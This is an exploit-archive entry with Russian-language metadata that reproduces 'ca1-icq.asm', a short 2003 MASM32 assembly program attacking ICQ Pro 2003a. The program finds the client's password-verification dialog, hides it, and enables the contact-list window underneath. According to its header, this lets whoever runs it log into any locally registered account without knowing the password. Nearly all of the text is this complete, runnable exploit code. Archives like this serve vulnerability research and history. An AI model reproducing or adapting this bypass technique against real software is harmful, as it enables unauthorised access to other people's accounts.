Exploit ICQ Pro 2003a - 'ca1-icq.asm' Password Bypass

[Exploiter]

EDB-ID

52

Проверка EDB

1. Пройдено

Автор

CAUA MOURA PRADO

Тип уязвимости

LOCAL

Платформа

WINDOWS

CVE

null

Дата публикации

2003-07-09

; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      BOF 
; -------------------------------------------------------------------------
;
;  07/02/2003 - ca1-icq.asm 
;  ICQ Password Bypass exploit.
;  written by Caua Moura Prado (aka ca1)
; 
;  This exploit allows you to login to ICQ server using any account registered *locally*
;  no matter the 'save password' option is checked or not. High level security is also bypassed. 
;  All you have to do is run the exploit and set status property using your mouse when the flower
;  is yellow. If you accidentally set status to offline then you will need to restart ICQ and run 
;  the exploit again. 
;
;        uh-oh!
;         ___     
;      __/   \__  
;     /  \___/  \        Vulnerable:
;     \__/+ +\__/          ICQ Pro 2003a Build #3800
;     /   ~~~   \
;     \__/   \__/        Not Vulnerable:
;        \___/                ICQ Lite alpha Build 1211
;                               ICQ 2001b and ICQ 2002a 
;    tHe Flaw Power       All other versions were not tested.                       
;                                                      
                           coded with masm32
; ________________________________________________________________exploit born in .br
        
.386
.model flat, stdcall
option casemap:none
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
szTextHigh byte 'Password Verification', 0 
szTextLow byte 'Login to server', 0
szClassName byte '#32770', 0
.data?
hWndLogin dword ?
.code
_entrypoint:
 invoke FindWindow, addr szClassName, addr szTextHigh
 mov hWndLogin, eax  
 .if hWndLogin == 0
   invoke FindWindow, addr szClassName, addr szTextLow
   mov hWndLogin, eax
 .endif 
 invoke GetParent, hWndLogin 
 invoke EnableWindow, eax, 1      ;Enable ICQ contact 
list
 invoke ShowWindow, hWndLogin, 0  ;get rid of Login 
screen (don't kill this window)
 invoke ExitProcess, 0            ;uhuu.. cya! i gotta 
sleep!
end _entrypoint

; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      EOF 
; -------------------------------------------------------------------------



; milw0rm.com [2003-07-09]